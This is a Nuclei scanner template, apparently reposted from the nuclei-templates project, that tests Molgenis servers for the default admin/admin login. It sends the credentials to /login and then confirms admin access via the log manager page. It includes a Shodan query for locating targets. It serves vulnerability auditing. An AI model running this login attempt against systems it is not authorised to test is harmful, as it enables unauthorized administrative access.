molgenis-default-login: Molgenis - Default Login

漏洞描述

Attempts to login to Molgenis using the default credentials (admin/admin). Successful login may indicate a security risk due to unchanged default credentials.

PoC代码[已公开]

id: molgenis-default-login

info:
  name: Molgenis - Default Login
  author: ritikchaddha
  severity: high
  description: |
    Attempts to login to Molgenis using the default credentials (admin/admin). Successful login may indicate a security risk due to unchanged default credentials.
  reference:
    - https://molgenis.org/
    - https://github.com/molgenis/molgenis-emx2
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"MOLGENIS"
  tags: molgenis,default-login,exposure,vuln

variables:
  username: 'admin'
  password: 'admin'

http:
  - raw:
      - |
        POST /login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}

      - |
        GET /menu/admin/logmanager HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: header_1
        words:
          - "Set-Cookie: JSESSIONID="

      - type: word
        part: body_2
        words:
          - "Sign out</button>"
          - "Log manager</a>"
        condition: and
# digest: 4a0a004730450220027c1733dd7de1ea7aaeac187608079fecb6d97d9757b0b57fd55469dd9633bf022100a2d69ee3ed391f8cacedfa799df9d39c64616e9a95d64bce11277035e2461668:922c64590222798bb761d5b6d8e72950

来源: https://github.com/projectdiscovery/nuclei-templates/blob/main/http/default-logins/molgenis/molgenis-default-login.yaml